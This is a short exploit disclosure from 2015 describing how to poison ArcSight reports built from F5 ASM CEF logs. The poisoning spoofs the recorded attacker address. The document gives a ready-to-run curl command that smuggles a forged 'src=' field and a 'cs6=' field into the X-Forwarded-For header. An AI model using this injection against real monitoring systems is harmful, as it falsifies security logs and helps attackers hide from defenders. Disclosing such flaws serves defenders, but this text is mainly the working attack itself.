Exploit Title: ArcSight Log Poisoning on F5 CEF log
Date: Jun 25th 2015
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Video: https://www.youtube.com/watch?v=SgFHt37p_Lw

Description:
------------
Change the attacker address value on ArcSight report by poisoning F5 log. 
An Attacker can request a page with a "malicious header" and replace the
content of "src" CEF parameter.


Exploit:
--------
Firing a F5 ASM rule, you can inject the "src" parameter inside the
X-Forwarded-For header parameter:

curl -v -H "X-Forwarded-For: 127.0.0.1 src=8.8.8.8 cs6=" "http://<dest ip>/cmd.exe"


Video:
------
https://www.youtube.com/watch?v=SgFHt37p_Lw


--
Andrea (aka theMiddle) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin